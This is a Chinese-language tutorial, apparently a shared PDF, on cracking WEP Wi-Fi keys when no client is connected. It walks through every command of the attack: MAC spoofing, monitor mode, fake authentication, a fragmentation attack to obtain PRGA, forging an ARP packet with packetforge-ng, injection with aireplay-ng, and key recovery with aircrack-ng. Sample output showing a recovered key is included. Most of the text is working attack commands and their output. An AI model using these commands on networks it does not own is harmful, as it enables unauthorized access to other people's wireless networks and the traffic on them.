2022年无客户端破解wep密码 .pdf

《2022年无客户端破解wep密码 .pdf》由会员分享，可在线阅读，更多相关《2022年无客户端破解wep密码 .pdf（4页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、关于破解wep 密码的教程已经很多，其工作原理是用aircrack-ng 工具包通过收集合法客户端上网时产生的大量数据包来进行破解，但是这个破解是建立在目标AP有活动客户端连接的基础上的，如果没有客户端或是客户端没有上网就会无法收集到足够的ivs 数据，很多试验失败的原因就是因为这个。本教程不适合破解WPA-PSK加密方式。一、试验环境软件：操作系统（OS）：BT3，工具:aircrack-ng（BT3自带）硬件：NTT FT-STC-Na/g PCM 无线网卡：可外接天线试验 AP：BUFFALO WHR-HP-G54，bssid(mac)：00:00:00:AB:CD:EF，工作频道6，e

2、ssid：Bigfoot（请注意大小写）,WEP加密。二、试验方案1.设置无线网卡MAC 地址。2.设置网卡为在指定的ap 的工作频道的监控模式。3.使用 airodump-ng来收集需要的IVS 数据4.使用 aireplay-ng 在试验 AP上产生虚假认证（fake authentication）。5.使用 fragmentation attack来获得 PRGA。6.使用上一步获得的PRGA用 packetforge-ng 工具来生成一个arp 包。7.使用第四步得到的arp 来注入攻击8.使用 aircrack-ng 破解以上所有使用的命令，都可以在linux 环境下使用-help

3、命令或是使用man xx 命令获得在线帮助,如 aireplay-ng help,man aireplay-ng,阅读该信息能给你极大的帮助，笔者想说的是学习linux 将加快你的破解过程，毕竟大部分hacker tools 在 linux 下有更好的支持。三：详细步骤1.设置无线网卡mac 地址启动 BT3,在图形界面中，打开一个窗口（shell），输入 ifconfig-a 查看网卡，外置网卡接口名是wifi1,状态是未载入。因为mac 地址比较难记，所以先不要载入，将MAC 地址修改成需伪造的任意的MAC 地址，方便后面使用。输入 macchanger-m 00:11:22:33:44:

4、55 wifi1-m 后跟要 伪造的MAC，之后再 跟要修 改的网 卡名即 可，这 里我们 将该网卡MAC 修 改成00:11:22:33:44:55 再输入 ifconfig-a wifi1 up载入网卡驱动。2.设置网卡在指定的ap 的工作频道的监控模式。现在我们可以使用如Kismet、Airosnort 等工具来扫描当前无线网络的AP，然后，我们需将网卡激活成 monitor 模式，才可以进行后续的破解。输入 airmon-ng start wifi1 6，这里 6 是你要破解ap 的工作频道，根据实际，换成你要破解ap 的实际工作频道（下同），这样网卡将启动监控模式。系统反馈rausb

5、0（mode monitor enabled），其中，rausb0 是无线网卡wifi1 监控模式时的接口名（下同）。输入抓包命令，抓包并查看你要破解ap 的 essid 和 bssid(mac)。输入 airodump-ng-ivs-w name-c 6 rausb0，把 rausb0 换成实际接口名（下同）。这样，你的窗口将显示一个工作站，可以看到你要破解ap 的 essid 和 bssid(mac)；记下 ap 的 essid 和 bssid(mac)。名师资料总结-精品资料欢迎下载-名师精心整理-第 1 页，共 4 页 -3.使用 aireplay-ng来获得 PRGA。这是非常关键的

6、一步。为让 AP接受数据包，你必须使网卡和AP关联。如果没有关联的话，目标AP将忽略所有从你网卡发送的数据包，并发送回一个未认证消息（DeAuthentication packet），IVS 数据将不会产生从而导致无法破解。上面窗口不关闭，另开一个窗口，用自己的网卡连接要破解的ap，输入 aireplay-ng-1 0-e aps essid-a aps bssid(mac)-h my fakemac rausb0 参数解释：-1 告诉 aireplay使用 fake authentication（虚假认证）；-e aps essid 告诉 aireplay目标 AP的 essid；-a ap

7、s bssid(mac)告诉 aireplay目标 AP 的 bssid号；-h my fakemac 告诉 aireplay我的网卡的fakemac 地址Rausb0 为我的网卡接口名，请注意换成自己实际的。该命令如果成功，系统将显示：如果不能成功，系统可能显示：20:28:02 Sending Authentication Request 20:28:02 Authentication successful 20:28:02 Sending Association Request 20:28:02 Association successful:-)20:28:02 Got a deauth

8、entication packet!20:28:05 Sending Authentication Request 20:28:05 Authentication successful 20:28:05 Sending Association Request 20:28:10 Sending Authentication Request 20:28:10 Authentication successful 20:28:10 Sending Association Request 不能成功的原因很多，具体有如下几种：1、目标 AP做了 BSSID(MAC)地址过滤2、你离目标AP物理距离太远3、

9、对方使用了WPA 加密4、网卡不支持注入5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道6、输入的 esid拼写有误，请注意检查以下为没有成功时系统列出的可能失败原因：Attack was unsuccessful.Possible reasons:*Perhaps BSSID(MAC)address filtering is enabled.*Check that the BSSID(-a option)is correct.*Try to change the number of packets(-o option).*The driver hasnt been patched

10、for injection.*This attack sometimes fails against some APs.*The card is not on the same channel as the AP.*Injection is not supported AT ALL on HermesI,Centrino,ndiswrapper and a few others chipsets.*Youre too far from the AP.Get closer,or lower 名师资料总结-精品资料欢迎下载-名师精心整理-第 2 页，共 4 页 -the transmit rate

11、(iwconfig rate 1M).你可以根据命令反馈消息来判断原因来尝试解决问题，比如获得一个合法的BSSID(MAC)并伪造BSSID(MAC)、使用-o 参数设置发送包的个数、设置网卡到一个较低的rate、到离目标 AP更近一点的地方，但是请注意：如果这一步不能成功，下面的步骤请不要再尝试，都是无用功！可以使用命令tcpdump 来确认网卡是否已经连接到目标AP 上tcpdump-n-e-s0-vvv-i rausb0 如果没连接成功，AP会反馈网卡告诉其未连接，这意味着AP会忽略所有来自你网卡的注入包，破解不会成功。成功的话则显示：tcpdump:WARNING:rausb0:no

12、IPv4 address assigned tcpdump:listening on rausb0,link-type IEEE802_11(802.11),capture size 65535 bytes 21:19:26.467114 0us BSSID:00:00:00:AB:CD:EF DA:ff:ff:ff:ff:ff:ff SA:00:00:00:AB:CD:EF Beacon(Bigfoot)1.0*2.0*5.5*11.0*18.0 24.0 36.0 54.0 Mbit ESS CH:6,PRIVACY(等一系列包信息)21:19:27.388775 0us BSSID:00

13、:00:00:AB:CD:EF DA:ff:ff:ff:ff:ff:ff SA:00:00:00:AB:CD:EF Beacon(Bigfoot)1.0*2.0*5.5*11.0*18.0 24.0 36.0 54.0 Mbit ESS CH:6,PRIVACY 21:19:29.129776 0us BSSID:00:00:00:AB:CD:EF DA:ff:ff:ff:ff:ff:ff SA:00:00:00:AB:CD:EF Beacon(Bigfoot)1.0*2.0*5.5*11.0*18.0 24.0 36.0 54.0 Mbit ESS CH:6,PRIVACY 29 packe

14、ts captured 29 packets received by filter 0 packets dropped by kernel 请按 ctrl+c来结束 tcpdump 进程,注意最后三行文字。4.使用 fragmentation attack来获得 PRGA（pseudo random genration algorithm）这里的 PRGA并不是 wep key数据，并不能用来解密数据包，而是用它来产生一个新的数据包以便我们在后面的步骤中进行注入。输入命令aireplay-ng-5-b aps bssid(mac)-h my fakemac rausb0来获得 xor 文件-5

15、 告诉 aireplay-ng 使用 fragmentation attack模式如果一切顺利，系统将显示：Use this packet?输入 y 回车，Saving chosen packet in replay_src-1104-212046.cap（保存了一个cap 文件，但并不能用来破解）这一步生成一个至关重要的xor 文件将被我们用来产生arp 数据包，如果你选的包不成功，请多试几次5.使用 packetforge-ng来产生一个 arp 包在第 4 步中我们得到了PRGA，我们可以利用这个PRGA 来产生一个注入包，其工作原理就是使目标 AP重新广播包，当AP重广播时，一个新的I

16、VS 将产生，我们就是利用这个来破解。现在，我们生成一个注入包。输入 ls（linux下查看当前目录的命令），看到刚才生成的一个后缀名为xor 的文件。接着输入packetforge-ng-0-a aps bssid(mac)-h my fakemac-k 255.255.255.255-l 255.255.255.255-y fragment-.xor-w arp-0 告诉 packetforge-ng来产生一个arp 包-k 是目标 IP（绝大部分AP都会对 255.255.255.255进行应答）名师资料总结-精品资料欢迎下载-名师精心整理-第 3 页，共 4 页 -l l是 L 的小写

17、，别和1 混淆，是源IP（绝大部分AP都会对255.255.255.255进行应答）-y（filename）是用来读取PRGA的文件,而其中的-.xor 是你刚才生成的文件名。-w（filename）将 arp 包写入文件，我用的文件名是arp 系统回显：Wrote packet to:arp6.注入 ARP包新开一个窗口，输入 aireplay-ng-2 r arp-x 1024 rausb0，发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是1024。-2 使用交互模式-r rap从文件中读入arp 包Rausb0 是网卡接口输入 y 回车攻击开始输入后，切换到air

18、odump-ng窗口，这时，前面的抓包窗口上的data 将迅速增加。BSSID STATION PWR Lost Packets Probes 00:00:00:AB:CD:EF 00:11:22:33:44:55 -1 0 5515 注意加方框的红字部分，可以看到我们的00:11:22:33:44:55已成功连接，有过破解经验的朋友知道出现客户端意味着什么吧_ PS：如果 BSSID data没有增长，请回到第三步用tcpdump 确认网卡是否和AP相关联。7.使用 aircrack-ng来破解到数据增加到3 万以上时，另开窗口,输入 aircrack-ng-n 64-b aps bssid(mac)name-01.ivs 其中 64 是 64 位密码，如果是128 位，换成 128 即可。KEY FOUND!A1:7E:E2:50:12:11:F0:67:62:E6:2E:A0:8F Decrypted correctly:100%至此，大功告成！名师资料总结-精品资料欢迎下载-名师精心整理-第 4 页，共 4 页 -